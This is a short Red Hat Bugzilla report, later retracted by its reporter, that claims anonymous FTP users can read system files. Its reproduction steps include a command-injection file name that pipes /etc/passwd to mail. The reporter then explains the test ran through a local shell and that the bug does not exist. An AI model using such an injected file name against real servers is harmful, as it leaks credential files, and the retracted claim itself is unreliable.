Red Hat Bugzilla – Bug 34249
access to system files from anonymous ftp login
Last modified: 2007-04-18 12:32:29 EDT
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
using put with special file names gives anonymous user access to
ftp server system files/resources. security issue
Steps to Reproduce:
1.log in via ftp from rh6.2 system to server runing rh6.2 as user ftp
2.type put"|cat /etc/passwd|mail email@example.com"
3. then quit.
Actual Results: you get an ftp error message but the ftp server's
password file is emailed to the email specified
testing on my own email server with my own email address, i was emailed
the system password file.
Expected Results: an error message saying invalid file name
I haven't built another linux machine to test it from but it seems like a
high security risk. It was descovered during a security audit i was doing
on our system. I have dissabled the ftp service for the moment until I
know of a fix.
appologies, this bug was tested from the mail/ftp server as a guest user, and
the local shell gave read acces to /etc/passwd so passwd file being emailed was
that of the telnet session, not the ftp session.
bug does not exist as per further testing. - please remove